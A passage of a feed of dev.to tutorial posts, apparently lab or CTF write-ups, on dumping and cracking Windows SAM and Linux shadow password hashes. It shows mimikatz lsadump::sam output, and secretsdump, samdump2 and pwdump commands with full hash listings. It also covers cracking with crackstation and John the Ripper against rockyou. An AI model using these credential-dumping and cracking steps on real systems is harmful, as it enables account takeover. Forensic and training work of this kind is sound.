class="gp"> -&gt;</span><span class="w"> </span>Impersonated <span class="o">!</span> <span class="gp"> * Process Token : {0;</span>003146ba<span class="o">}</span> 0 D 3995258 BRICK-MAIL<span class="se">\w</span>rohitS-1-5-21-1966530601-3185510712-10604624-1014 <span class="o">(</span>14g,24p<span class="o">)</span> Primary <span class="gp"> * Thread Token : {0;</span>000003e7<span class="o">}</span> 1 D 4017344 NT AUTHORITY<span class="se">\S</span>YSTEM S-1-5-18 <span class="o">(</span>04g,21p<span class="o">)</span> Impersonation <span class="o">(</span>Delegation<span class="o">)</span> <span class="gp"> mimikatz #</span><span class="w"> </span>lsadump::sam <span class="go"> Domain : BRICK-MAIL SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821 Local SID : S-1-5-21-1966530601-3185510712-10604624 SAMKey : 6e708461100b4988991ce3b4d8b1784e RID : 000001f4 (500) User : Administrator Hash NTLM: 2dfe3378335d43f9764e581b856a662a Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 3d527dff081980ff09e87e492cebee23 * Primary:Kerberos-Newer-Keys * Default Salt : EC2AMAZ-QTVAAHMAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : 9484aadacd6c5994aed633bf92b6b3db31c57c932d2cd84a7fa635a0b3262806 aes128_hmac (4096) : cdda685dd630dd0796e5ddf38e22dce5 des_cbc_md5 (4096) : 08340db613fb46b5 OldCredentials aes256_hmac (4096) : 50141e3b3b449512e393a66c32e7f89a131744eef5d8a3f6a8576919a810cda3 aes128_hmac (4096) : 0d717b42dbaf77bb7248b4bebf8bb3a6 des_cbc_md5 (4096) : bc23a20170542f25 OlderCredentials aes256_hmac (4096) : 3b191b95e0b1fa83077319699194a79c8adea64e36bade3e959ccbbff42ea095 aes128_hmac (4096) : 318ecf3e0f6b969a949092706b519548 des_cbc_md5 (4096) : 97f7bc3ead1f6ed6 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : EC2AMAZ-QTVAAHMAdministrator Credentials des_cbc_md5 : 08340db613fb46b5 OldCredentials des_cbc_md5 : bc23a20170542f25 RID : 000001f5 (501) User : Guest RID : 000001f7 (503) User : DefaultAccount RID : 000001f8 (504) User : WDAGUtilityAccount Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : a1528cd40d99e5dfa9fa0809af998696 * Primary:Kerberos-Newer-Keys * Default Salt : WDAGUtilityAccount Default Iterations : 4096 Credentials aes256_hmac (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55 aes128_hmac (4096) : 15ac5054635c97d02c174ee3aa672227 des_cbc_md5 (4096) : ce9b2cabd55df4ce * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : WDAGUtilityAccount Credentials des_cbc_md5 : ce9b2cabd55df4ce RID : 000003f1 (1009) User : fstamatis Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 2ac6116566738883775d4c64894922ea * Primary:Kerberos-Newer-Keys * Default Salt : BRICK-MAILfstamatis Default Iterations : 4096 Credentials aes256_hmac (4096) : b677f117b8f87d99bd2bec0dc2763404eb28d34e173722ec4d663d439b121c6d aes128_hmac (4096) : d96cbd8c143e83959cf98b1b37bc5c08 des_cbc_md5 (4096) : 017acb2f802a70a2 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : BRICK-MAILfstamatis Credentials des_cbc_md5 : 017acb2f802a70a2 RID : 000003f2 (1010) User : lhedvig Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 9a9fe1153250a8c494ac7290b6e86bec * Primary:Kerberos-Newer-Keys * Default Salt : BRICK-MAILlhedvig Default Iterations : 4096 Credentials aes256_hmac (4096) : 9cc3c27c2b6a7a6bfdcf4c9790aee0bd3012f337a8c452a0a5321ee6673c663b aes128_hmac (4096) : 9d9bc45f622cf03fe08b86bd9ef45e5a des_cbc_md5 (4096) : d96770bce3ba327a * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : BRICK-MAILlhedvig Credentials des_cbc_md5 : d96770bce3ba327a RID : 000003f3 (1011) User : oaurelius Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : bb03e2de24b406b050d5c4b110de5d94 * Primary:Kerberos-Newer-Keys * Default Salt : BRICK-MAILoaurelius Default Iterations : 4096 Credentials aes256_hmac (4096) : 4e4d369c51fe79b5fa9cd372a6e2983b3d30ae43f7990701548775d087106532 aes128_hmac (4096) : ed9ae473c2213b7994c94e800cdb05ca des_cbc_md5 (4096) : 3167266bd54c3191 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : BRICK-MAILoaurelius Credentials des_cbc_md5 : 3167266bd54c3191 RID : 000003f4 (1012) User : pcathrine Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : e52951c39856ffc37c81c2df09ccad3c * Primary:Kerberos-Newer-Keys * Default Salt : BRICK-MAILpcathrine Default Iterations : 4096 Credentials aes256_hmac (4096) : ea10cad59f29a9c8daf61992e574781a095d9e4c6443da8170a7c07c051eda59 aes128_hmac (4096) : 93005a1203c24a41c9a05beee9662d13 des_cbc_md5 (4096) : ae701fec345b3b8c * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : BRICK-MAILpcathrine Credentials des_cbc_md5 : ae701fec345b3b8c RID : 000003f5 (1013) User : tchikondi Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 5588ad299d776483b44417c0bd88861a * Primary:Kerberos-Newer-Keys * Default Salt : BRICK-MAILtchikondi Default Iterations : 4096 Credentials aes256_hmac (4096) : eaa49b1593bb2c8240611ead9100002a3c520fcbfd103629da20046e5f093b10 aes128_hmac (4096) : ef093a7d07ae03cedfbe3098a7376706 des_cbc_md5 (4096) : 6bab43253e6b4aa1 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : BRICK-MAILtchikondi Credentials des_cbc_md5 : 6bab43253e6b4aa1 RID : 000003f6 (1014) User : wrohit Hash NTLM: 8458995f1d0a4b0c107fb8********** Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 5e0d9f81c0780c189099b7758d79a2e6 * Primary:Kerberos-Newer-Keys * Default Salt : BRICK-MAILwrohit Default Iterations : 4096 Credentials aes256_hmac (4096) : 06cf703200c4fcd6ffaca428e96f18e5063dbb956c58aa7edee5b5acd7817b64 aes128_hmac (4096) : 8976fef34b9b36fea80c2d65c764ec5e des_cbc_md5 (4096) : 192558b67f7983a4 OldCredentials aes256_hmac (4096) : 227b60e30b0f1b929da7a0022c56de98121b6b8c151061be8f3923b823b6a85a aes128_hmac (4096) : 82b5027730dd8a73890e09ea65cec047 des_cbc_md5 (4096) : 13adae677067f7e9 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : BRICK-MAILwrohit Credentials des_cbc_md5 : 192558b67f7983a4 OldCredentials des_cbc_md5 : 13adae677067f7e9 </span></code></pre> </div> <p>And we get the NTLM hash of "wrohit" -&gt;<br> <code>User : wrohit Hash NTLM: 8458995f1d0a4b0c107fb8**********</code> </p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb56ywkfji4xgmtc1pfe3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb56ywkfji4xgmtc1pfe3.png" alt=" " width="799" height="394"></a></p> <p>Lastly, we are tasked with finding the password for the hMailServer Administrator Dashboard<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">C:\Mail\Attachments&gt;</span><span class="nb">dir </span>C:<span class="se">\*</span>hMailServer<span class="k">*</span> /s <span class="go">dir C:\*hMailServer* /s Volume in drive C has no label. Volume Serial Number is A8A4-C362 Directory of C:\Program Files (x86) </span><span class="gp">01/29/2024 05:45 AM &lt;DIR&gt;</span><span class="w"> </span>hMailServer <span class="go"> 0 File(s) 0 bytes Directory of C:\Program Files (x86)\hMailServer\Addons\DataDirectorySynchronizer 10/03/2021 08:12 AM 176,128 Interop.hMailServer.dll 1 File(s) 176,128 bytes Directory of C:\Program Files (x86)\hMailServer\Bin 10/03/2021 08:12 AM 4,636,672 hMailServer.exe 02/25/2024 11:15 PM 604 hMailServer.INI 10/03/2021 08:12 AM 19,456 hMailServer.Minidump.exe 10/03/2021 08:09 AM 163,976 hMailServer.tlb 10/03/2021 08:12 AM 176,128 Interop.hMailServer.dll 5 File(s) 4,996,836 bytes Directory of C:\Program Files (x86)\hMailServer\Database 06/17/2026 06:45 AM 675,840 hMailServer.sdf 1 File(s) 675,840 bytes Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs </span><span class="gp">01/29/2024 05:45 AM &lt;DIR&gt;</span><span class="w"> </span>hMailServer <span class="go"> 0 File(s) 0 bytes Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hMailServer 01/29/2024 05:45 AM 1,175 hMailServer Administrator.lnk 01/29/2024 05:45 AM 1,158 hMailServer Database Setup.lnk 2 File(s) 2,333 bytes Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hMailServer\Installation 01/29/2024 05:45 AM 1,077 Uninstall hMailServer.lnk 1 File(s) 1,077 bytes Directory of C:\Users\Administrator\AppData\Local\Halvar Information </span><span class="gp">01/29/2024 05:42 AM &lt;DIR&gt;</span><span class="w"> </span>hMailServer <span class="go"> 0 File(s) 0 bytes Directory of C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100 03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Addons_DataDirectorySynchronizer_DataDirectorySynchronizer_exe 03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Bin_DBSetup_exe 03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Bin_hMailAdmin_exe 03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_unins000_exe 4 File(s) 148,056 bytes Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent 02/25/2024 11:15 PM 1,009 hMailServer.lnk 1 File(s) 1,009 bytes Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs </span><span class="gp">01/29/2024 05:45 AM &lt;DIR&gt;</span><span class="w"> </span>hMailServer <span class="go"> 0 File(s) 0 bytes Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\hMailServer 01/29/2024 05:45 AM 1,175 hMailServer Administrator.lnk 01/29/2024 05:45 AM 1,158 hMailServer Database Setup.lnk 2 File(s) 2,333 bytes Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\hMailServer\Installation 01/29/2024 05:45 AM 1,077 Uninstall hMailServer.lnk 1 File(s) 1,077 bytes </span></code></pre> </div> <p>I gave this terminal directory output and ask the AI about the best chance to get that type of info from and the AI said -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg7pb1lkc3gjl1741ay2o.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg7pb1lkc3gjl1741ay2o.png" alt=" " width="657" height="215"></a></p> <p>And we got the Administrator's Password -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwcqudixprktwlkyzzr1t.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwcqudixprktwlkyzzr1t.png" alt=" " width="660" height="375"></a></p> <p>Decode that hash in crackstation you will get the password :)</p> Md. Ibrahim Reza Rabbi Sun, 19 Apr 2026 17:23:10 +0000 https://dev.to/ibrahim71reza/how-to-crack-the-sam-database-in-kali-linux-windows-password-hash-extraction-guide-3jek https://dev.to/ibrahim71reza/how-to-crack-the-sam-database-in-kali-linux-windows-password-hash-extraction-guide-3jek <p>In this guide, I will show you an approach to crack the Windows SAM database NTLM hashes. Before cracking, you first need to obtain these three files from the target system: <strong>SAM, SYSTEM, and SECURITY</strong>. I had a <strong>.ova</strong> file of a Windows virtual machine, so I will demonstrate how to extract them from that image. First, you need to dump the target system’s image. If it is a VM or virtual disk image, then this method of extracting those three files will be useful for you.</p> <p>Convert the <strong>.ova</strong> file into a .rar file and then extract that . And we got this →</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fipsclsl44c8n7z7q44id.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fipsclsl44c8n7z7q44id.png" alt=" " width="800" height="278"></a></p> <p>I loaded the “Windows-disk001.vmdk” file as an image in Magnet AXIOM. You can also use Autopsy or FTK Imager for this task. When the processing was complete, we went to the →</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzgti9bvam8box6m1tj9.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzgti9bvam8box6m1tj9.png" alt=" " width="800" height="673"></a></p> <p>Directory → “ windows/system32/config “</p> <p>Exported SAM , SYSTEM &amp; SECURITY file and paste that in kali linux .<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">┌──(kali㉿kali)-[~/Windows_dump] </span><span class="gp">└─$</span><span class="w"> </span><span class="nb">sudo </span>apt <span class="nb">install </span>python3-impacket <span class="go">python3-impacket is already the newest version (0.12.0+gite61ff5d-0kali1). Summary: Upgrading: 0, Installing: 0, Removing: 0, Not Upgrading: 235 ┌──(kali㉿kali)-[~/Windows_dump] </span><span class="gp">└─$</span><span class="w"> </span>python3 <span class="nt">-m</span> impacket.examples.secretsdump <span class="nt">-sam</span> SAM <span class="nt">-system</span> SYSTEM LOCAL <span class="go"> ┌──(kali㉿kali)-[~/Windows_dump] </span><span class="gp">└─$</span><span class="w"> </span>samdump2 SYSTEM SAM <span class="o">&gt;</span> hashes.txt <span class="go">┌──(kali㉿kali)-[~/Windows_dump] </span><span class="gp">└─$</span><span class="w"> </span><span class="nb">cat </span>hashes.txt <span class="go">Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1007:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1008:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1009:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1011:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1012:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1013:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1014:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1015:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1016:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1017:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1018:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: :1019:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: support_admin:1020:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ┌──(kali㉿kali)-[~/Windows_dump] </span><span class="gp">└─$</span><span class="w"> </span><span class="nb">ls</span> <span class="go">hashes.txt SAM SECURITY SYSTEM ┌──(kali㉿kali)-[~/Windows_dump] </span><span class="gp">└─$</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hkruzbzjeuzpp43ie0e.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hkruzbzjeuzpp43ie0e.png" alt=" " width="800" height="708"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb3o4l3ztq79nyjvjbmuu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb3o4l3ztq79nyjvjbmuu.png" alt=" " width="800" height="447"></a></p> <p>After that the hash will be cracked if that password is present in the "rockyou.txt" wordlist<br> If you want more powerful one →</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frpx7ubxcui5ik67kcwln.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frpx7ubxcui5ik67kcwln.png" alt=" " width="747" height="731"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">┌──(kali㉿kali)-[~/Windows_dump] </span><span class="gp">└─$</span><span class="w"> </span>creddump7 <span class="go">creddump7 - Python tool to extract credentials and secrets from Windows registry hives /usr/share/creddump7 ├── cachedump.py ├── framework ├── lsadump.py ├── pwdump.py └── __pycache__ ┌──(kali㉿kali)-[/usr/share/creddump7] </span><span class="gp">└─$</span><span class="w"> </span><span class="nb">ls</span> <span class="go">cachedump.py framework lsadump.py pwdump.py __pycache__ ┌──(kali㉿kali)-[/usr/share/creddump7] </span><span class="gp">└─$</span><span class="w"> </span>python pwdump.py <span class="gp">usage: pwdump.py &lt;system hive&gt;</span><span class="w"> </span>&lt;SAM hive&gt; <span class="go"> ┌──(kali㉿kali)-[/usr/share/creddump7] </span><span class="gp">└─$</span><span class="w"> </span>python pwdump.py ~/Windows_dump/SYSTEM ~/Windows_dump/SAM <span class="go">Administrator:500:aad3b435b51404eeaad3b435b51404ee:22775c1ecbe2bd7d69c6dcd55b7f9b25::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4fa9775c90b54e688035a28e04d59a3c::: james.l:1000:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: amir.k:1001:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: sadia.b:1002:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: karim.r:1003:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: anika.d:1004:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: rashed.h:1005:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: nafisa.j:1006:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: sumon.t:1007:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: nazia.c:1008:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: arif.w:1009:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: kamal.n:1010:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: bilkis.z:1011:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: rubel.m:1012:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: tania.y:1013:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: robin.p:1014:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: sohan.v:1015:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: nayeem.d:1016:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: salma.q:1017:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: hossain.a:1018:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: meem.u:1019:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd::: support_admin:1020:aad3b435b51404eeaad3b435b51404ee:8a46225c4f14f99711b0c2d6002d3af2::: </span></code></pre> </div> <p>with “ john jumbo “ ⇒</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq0ixcbx51mxlgohjllx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq0ixcbx51mxlgohjllx.png" alt=" " width="800" height="240"></a></p> <p>And, after that the password will be cracked.</p> cybersecurity linux security tutorial Md. Ibrahim Reza Rabbi Sun, 19 Apr 2026 11:45:08 +0000 https://dev.to/ibrahim71reza/recover-lost-linux-password-using-yescrypt-hash-cracking-kali-shadow-file-guide-2645 https://dev.to/ibrahim71reza/recover-lost-linux-password-using-yescrypt-hash-cracking-kali-shadow-file-guide-2645 <p>In Linux systems, user passwords are not stored in plain text. Instead, they are stored as cryptographic hashes inside the <code>/etc/shadow</code> file. Modern distributions use <strong>yescrypt (<code>$y$</code>)</strong>, a memory-hard password hashing algorithm designed to resist brute-force and GPU-based attacks.</p> <p>Since hashing is a one-way function, passwords cannot be decrypted. Recovery is done through <strong>hash cracking</strong>, where candidate passwords are hashed and compared against the stored value. Tools such as John the Ripper Jumbo are commonly used for this process.</p> <p>Because yescrypt is computationally expensive, <strong>blind brute-force attacks are inefficient</strong>. The most practical approach is a <strong>dictionary attack</strong>, where prebuilt wordlists (such as <code>rockyou.txt</code>) are used along with mutation rules. In real-world CTFs, success depends heavily on contextual guessing, such as usernames, system themes, or predictable password patterns.</p> <h2> Hash Location in Linux </h2> <p>Password hashes are stored in <code>/etc/shadow</code> with the following structure:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>username:hash:lastchg:min:max:warn:inactive:expire:reserved </code></pre> </div> <p>Example entry:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kali:<span class="nv">$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$xhkUmB8R9fzETc</span>/1kgL/nOPcWFTvhn17clxXCgyFjpC:19953:0:99999:7::: </code></pre> </div> <h3> Breakdown: </h3> <ul> <li> <code>kali</code> → username </li> <li> <code>$y$j9T$...</code> → password hash (used for cracking only) <ul> <li> <code>$y$</code> → yescrypt algorithm </li> <li> <code>j9T</code> → cost parameters </li> <li>salt → <code>zY1oKFxJlTgP2WcJhzbNl1</code> </li> <li>hash → <code>xhkUmB8R9fzETc/...</code> </li> </ul> </li> <li>Remaining fields → password policy metadata </li> </ul> <p>For cracking purposes, only the hash portion is required:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$xhkUmB8R9fzETc/1kgL/nOPcWFTvhn17clxXCgyFjpC </code></pre> </div> <p><strong>Now, before cracking, you also need to get that hash from your system :)</strong><br><br> For this purpose, we will choose the <strong><em>Autopsy</em></strong> software, which is a free forensic tool. Install it and open an empty case. When complete, follow the image instructions. </p> <p><strong>Note:</strong> The given process works for Disk image type or VM type file forensics.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft6o4ovtad3smqrng5hy8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft6o4ovtad3smqrng5hy8.png" alt=" " width="800" height="569"></a><br> Now, select the image contain file and the image -&gt;</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8tqvnrtj5f8z0696prtl.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8tqvnrtj5f8z0696prtl.png" alt=" " width="800" height="553"></a></p> <p>Then, go next , next. Then it start the analyze and it will take some time when it is finish by the given image way you will be able to get the shadow file :')-&gt;</p> <h2> <img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2hmircndt4pw6hzcpnsj.png" alt=" " width="800" height="550"> </h2> <h2> Step 1: Prepare Hash File </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$xhkUmB8R9fzETc/1kgL/nOPcWFTvhn17clxXCgyFjpC'</span> <span class="o">&gt;</span> hash.txt </code></pre> </div> <p>Now, for cracking I will prefer John the ripper. If, default kali not work then you may use the john jumbo <a href="https://github.com/openwall/john" rel="noopener noreferrer">link</a> &amp; <a href="https://github.com/openwall/john/blob/bleeding-jumbo/doc/INSTALL" rel="noopener noreferrer">install_explain_link</a>. After, it is installed let's follow the below steps</p> <h2> Step 2: Dictionary Attack </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>john <span class="nt">--format</span><span 